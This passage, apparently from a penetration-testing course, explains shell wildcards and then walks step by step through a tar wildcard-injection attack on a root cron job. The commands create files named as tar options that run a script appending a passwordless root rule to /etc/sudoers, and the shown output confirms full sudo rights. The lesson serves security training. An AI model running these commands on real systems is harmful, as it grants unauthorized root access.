Examples of wild cards
||An asterisk that can match any number of characters in a file name.|
||Matches a single character.|
||Brackets enclose characters and can match any single one at the defined position.|
||A tilde at the beginning expands to the name of the user home directory or can have another username appended to refer to that user's home directory.|
||A hyphen within brackets will denote a range of characters.|
An example of how wildcards can be abused for privilege escalation is the
tar command, a common program for creating/extracting archives. If we look at the man page for the
tar command, we see the following:
xyz_student@NIX02:~$ man tar <SNIP> Informative output --checkpoint[=N] Display progress messages every Nth record (default 10). --checkpoint-action=ACTION Run ACTION on each checkpoint.
--checkpoint-action option permits an
EXEC action to be executed when a checkpoint is reached (i.e., run an arbitrary operating system command once the tar command executes.) By creating files with these names, when the wildcard is specified,
--checkpoint-action=exec=sh root.sh is passed to
tar as command-line options.
Consider the following cron job, which is set up to back up the
/root directory's contents and create a compressed archive in
/tmp. The cron job is set to run every minute, so it is a good candidate for privilege escalation.
# # mh dom mon dow command */01 * * * * cd /tmp && tar -zcf /tmp/backup.tar.gz *
We can leverage the wild card in the cron job to write out the necessary commands as file names with the above in mind. When the cron job runs, these file names will be interpreted as arguments and execute any commands that we specify.
xyz_student@NIX02:~$ echo 'echo "cliff.moore ALL=(root) NOPASSWD: ALL" >> /etc/sudoers' > root.sh xyz_student@NIX02:~$ echo "" > "--checkpoint-action=exec=sh root.sh" xyz_student@NIX02:~$ echo "" > --checkpoint=1
Check and see that the necessary files were created.
xyz_student@NIX02:~$ ls -la total 56 drwxrwxrwt 10 root root 4096 Aug 31 23:12 . drwxr-xr-x 24 root root 4096 Aug 31 02:24 .. -rw-r--r-- 1 root root 378 Aug 31 23:12 backup.tar.gz -rw-rw-r-- 1 cliff.moore cliff.moore 1 Aug 31 23:11 --checkpoint=1 -rw-rw-r-- 1 cliff.moore cliff.moore 1 Aug 31 23:11 --checkpoint-action=exec=sh root.sh drwxrwxrwt 2 root root 4096 Aug 31 22:36 .font-unix drwxrwxrwt 2 root root 4096 Aug 31 22:36 .ICE-unix -rw-rw-r-- 1 cliff.moore cliff.moore 60 Aug 31 23:11 root.sh
Once the cron job runs again, we can check for the newly added sudo privileges and sudo to root directly.
xyz_student@NIX02:~$ sudo -l Matching Defaults entries for cliff.moore on NIX02: env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin User cliff.moore may run the following commands on NIX02: (root) NOPASSWD: ALL